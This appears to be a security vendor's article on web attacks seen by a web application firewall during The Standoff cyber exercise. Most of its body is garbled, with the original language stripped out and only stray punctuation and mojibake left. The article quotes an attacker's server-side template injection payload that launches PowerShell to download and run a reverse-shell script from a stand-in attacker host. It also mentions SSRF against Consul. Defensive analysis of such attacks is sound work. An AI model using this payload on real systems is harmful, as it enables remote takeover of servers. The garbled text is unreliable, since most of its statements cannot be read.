WAF Verdict, or What Happened to Web Resources of Companies' Digital Twins at The Standoff

At the last The Standoff, we, the PT Expert Security Center team , in parallel with the participants in the confrontation from the defense side, monitored the infrastructure of the site and individual offices of the digital copy of the metropolis deployed on our cyber polygon. To do this, we deployed an additional security operations center (SOC) , which, as it were, covered the entire infrastructure, due to which it โ€œsawโ€ all the activities of The Standoff participants and even a little more. One of the tools of this SOC was PT Application Firewall - a web application layer firewall (read about the results of the work of another of our SOC tools - PT Sandbox - in one of our previous articles). Below we will focus exclusively on what was happening on the site from the point of view of the web and what targets were chosen by the attacking teams.





General attack statistics

As part of The Standoff, we monitored attacks on the portal of the site itself, as well as on 30 web resources included in the gaming infrastructure of the training ground. These were resources used both in the main game (Meters of the 25 Hours office - a resource for transmitting meter readings, Consul for Nuft - a service management platform, which will be discussed below), and in bug bounty (for example, CMS Umbraco for Bank of FF, Mantis Bugtracker for 25 Hours is a bug tracking system for software products, rConfir RCE is a network configuration management service for the Big Bro Group). Read teams received points for implementing risks, as well as searching for vulnerabilities in systems and reporting.





Who was who in the cyber polygon:





- Heavy Ship Logistics โ€” , , , ;









- 25 Hours โ€” , , , ;









- Tube โ€” , , , ;









- Nuft โ€” , ; 









- Big Bro Group โ€” ;









- Bank of FF โ€” . 









โ€” , . โ€” , bug bounty, ยซยป , . 13. bug bounty . ยซยป, (, RCE Flack BookStore SQL Injection โ€” capture the flag). 29 30 - ( , ). , , web application firewall.





The Standoff PT Application Firewall โ€” .





Figure 1. Distribution of attacks by gaming days
1.

. 1 . , โ€” , โ€” , โ€” . , , . .





( The Standoff 12:00 12 14:00 17 ).





Figure 2. List of the most common attacks
2.

, PT Application Firewall, , , , . . , , , . , .





ube Bank of FF: CMS Made Simple (CMS), bbord ( ), CMS Umbraco, Prestoshop ( ), Avideo encoder ( ), FHEM tomcat ( ), Consul, openEMR ( ), ATutor ( ) rConfig.





. nmap Burp Suite Python Go: Metasploit. burp suite, Metasploit, Responder-.





30 , , , 5 6 2 6 . , โ€” , .





.





ยซ 25 Hoursยป Meters. , . HubL, {{}} . , , . : {{7*7}} , 7*7.





Figure 3. Server Side Template Injection (SSTI) detection in PT Application Firewall for Meters application (detection rule adapted to The Standoff)
3. Server Side Template Injection (SSTI) PT Application Firewall Meters ( The Standoff )
Figure 4. Distribution of SSTI attacks for the Meters application
4. SSTI Meters





:





{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval("var x=new java.lang.ProcessBuilder(\"cmd.exe\",\"/c\",\"powershell -exec bypass IEX (New-Object Net.WebClient).DownloadString('http://attacker-ip/mini-reverse.ps1');\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())")}}.
      
      



.





, (, ), ( ) .





โ€” , Nuft Consul. . Server Side Request Forgery, Gopher PUT .





200 .





Figure 5. Attack on the Consul application (RCE).
5. Consul (RCE).

, ( โ€” ) ( โ€” ).





( false positive) . .





proofs of concept , . , , , .





, CMS Umbraco ( Bank of FF) , - POST; .





Figure 6. Web traffic detection rule for CMS Umbraco
6. - CMS Umbraco

, Meters, , โ€” .





Figure 7. Rule for detecting attacks on Meters for commands executed by the interpreter in {}
7. Meters , {}

request path .





30 . , . . , (ODBC) backup ยซยป .





, ( The Standoff) , , . web application firewall. PT Application Firewall , . , false positive , .





Positive Technologies (PT Expert Security Center)








All Articles